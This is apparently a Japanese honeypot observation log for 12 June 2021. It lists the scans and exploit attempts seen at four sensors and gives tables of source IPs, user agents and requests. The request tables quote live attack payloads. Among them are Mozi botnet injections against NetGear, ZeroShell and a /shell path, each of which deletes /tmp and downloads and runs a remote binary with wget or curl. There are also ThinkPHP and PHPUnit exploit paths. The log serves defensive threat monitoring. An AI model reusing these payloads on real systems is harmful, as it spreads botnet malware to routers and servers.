ハニーポット(仮) 観測記録 2021/06/12分です。
特徴
共通
/.envへのスキャン行為
Location:JP
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
104[.]149[.]194[.]78に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:US
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//45[.]229[.]54[.]226:41943/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
104[.]149[.]194[.]78に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
104[.]149[.]194[.]78に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:57 (前日比:-15)
US:総アクセス数:36 (前日比:+8)
UK:総アクセス数:28 (前日比:-2)
SG:総アクセス数:29 (前日比:-40)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 18.209.228.252 | United States |
| 1 | 20.64.121.110 | United States |
| 1 | 20.185.31.10 | United States |
| 1 | 34.126.139.245 | United States |
| 11 | 45.146.165.123 | Russia |
| 5 | 50.31.21.8 | United States |
| 1 | 51.89.201.50 | France |
| 1 | 52.188.23.183 | United States |
| 3 | 52.231.13.90 | United States |
| 1 | 62.210.88.212 | France |
| 1 | 63.35.229.37 | United States |
| 2 | 68.183.57.170 | United States |
| 4 | 71.77.65.253 | United States |
| 1 | 91.134.183.114 | France |
| 1 | 119.179.215.103 | China |
| 1 | 119.190.146.125 | China |
| 1 | 123.129.129.155 | China |
| 1 | 134.209.97.123 | United States |
| 6 | 135.125.246.189 | France |
| 1 | 172.104.242.173 | United States |
| 1 | 172.245.158.3 | United States |
| 1 | 178.175.52.104 | Albania |
| 1 | 178.175.120.37 | Albania |
| 1 | 182.123.252.158 | China |
| 1 | 185.117.2.115 | Germany |
| 1 | 190.83.155.186 | Trinidad and Tobago |
| 3 | 201.202.236.22 | Costa Rica |
| 2 | 212.227.164.219 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 1 | Hello, World |
| 2 | Mozilla 5/0 |
| 1 | Mozilla/5.0 |
| 2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 4 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4131.4 Safari/537.36 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 19 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
| 1 | python-requests/2.25.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x16\x03\x01 | ||
| 20 | GET | /.env | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /_profiler/latest | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /evox/about | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1623362195 | HTTP/1.1 |
| 5 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119[.]179[.]215[.]103:59097/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]52[.]104:56207/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]123[.]252[.]158:33767/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/phpunit.xml | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | /xmlrpc.php?rsd | HTTP/1.1 |
| 1 | GET | http[:]//104[.]149[.]194[.]78:80/ | HTTP/1.1 |
| 2 | HEAD | / | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /sdk | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 3.239.182.244 | United States |
| 1 | 5.188.210.227 | Russia |
| 1 | 20.75.49.253 | United States |
| 1 | 23.99.88.44 | United States |
| 11 | 45.146.165.123 | Russia |
| 1 | 45.229.54.226 | Brazil |
| 1 | 54.186.22.229 | United States |
| 1 | 84.38.186.69 | Russia |
| 2 | 91.194.55.194 | Turkey |
| 6 | 91.241.19.99 | Russia |
| 1 | 104.197.138.79 | United States |
| 1 | 110.35.194.11 | South Korea |
| 1 | 138.68.85.5 | United States |
| 1 | 141.94.22.138 | France |
| 1 | 161.35.197.19 | United States |
| 1 | 172.104.242.173 | United States |
| 3 | 212.47.244.68 | France |
| 1 | 217.146.81.127 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 1 | Hello, world |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 8 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 6 | \x03 | ||
| 1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
| 8 | GET | /.env | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//45[.]229[.]54[.]226:41943/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.ISC.SANS.DFind:) | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
| 1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
| 1 | POST | /.env | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | http[:]//blacksun[.]site/770ff81ae4d4371f9639f4dfd4115a27d776f16dc93e0606fcf925b29811ae76419ad761d9d9931866ebedec5fa68459e7ee72b1089059dc7e6977e6a0111c3c31f3c001bd16c305f701b3b13a0b4081d2effc4609b356eb0451e6a8ae316763 | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.55.52.140 | United States |
| 1 | 51.81.196.145 | United States |
| 1 | 62.210.88.212 | France |
| 2 | 93.190.217.98 | Turkey |
| 4 | 103.40.172.174 | Hong Kong |
| 3 | 103.40.172.190 | Hong Kong |
| 1 | 112.94.98.71 | China |
| 1 | 116.68.110.245 | India |
| 6 | 140.206.86.125 | China |
| 1 | 157.230.239.248 | United States |
| 1 | 162.62.123.46 | Singapore |
| 2 | 172.104.242.173 | United States |
| 1 | 172.105.77.209 | United States |
| 1 | 186.74.151.40 | Panama |
| 1 | 193.200.50.189 | Poland |
| 1 | 210.13.110.61 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 20 | - |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 6 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 5 | GET | /.env | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 14 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 1 | GET | /nice%20ports%2C/Tri%6Eity.txt%2ebak | HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]68[.]110[.]245:40585/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | http[:]//104[.]149[.]194[.]78:80/ | HTTP/1.1 |
| 1 | POST | /.env | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 11 | 45.146.165.123 | Russia |
| 1 | 45.229.55.95 | Brazil |
| 1 | 62.210.88.212 | France |
| 1 | 63.35.229.37 | United States |
| 1 | 65.153.53.242 | United States |
| 1 | 66.249.64.237 | United States |
| 1 | 84.38.130.227 | Belize |
| 1 | 91.134.183.114 | France |
| 3 | 163.172.168.251 | United Kingdom |
| 1 | 165.22.218.48 | United States |
| 1 | 180.105.58.17 | China |
| 1 | 185.117.2.115 | Germany |
| 1 | 202.164.138.139 | India |
| 3 | 212.47.244.68 | France |
| 1 | 219.157.215.219 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 2 | Hello, World |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/56.0.3051.116 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 2 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 OPR/54.0.2952.64 |
| 5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
| 5 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//219[.]157[.]215[.]219:48018/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | http[:]//104[.]149[.]194[.]78:80/ | HTTP/1.1 |
| 2 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 2 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | http[:]//niezwykla[.]website/22d6a325e40be882ceb627298e286f16dbd3aad39677d386a73158be3744a381e36127adc00c63345967d8437a318ba555f8eb1907b6a6e5ff25dc3011f1de89a21b365c34b6c6752471fd2165be850d0ce106ecf54e972d3739e93e96993280 | HTTP/1.1 |
| 1 | POST | http[:]//withthis[.]site/8fa5381d2748c0d21a4aee1d8a25bed6d59cafe8f1cf8028ad7590cf627ff5ec5b81f1d32ca4b076c8b45906db2ac3afca84ee5da17d7b8cd6a1770c292d148f29271b6d4beee1431dd6b28327f516727035630fea107f265725f914ea034b23 | HTTP/1.1 |
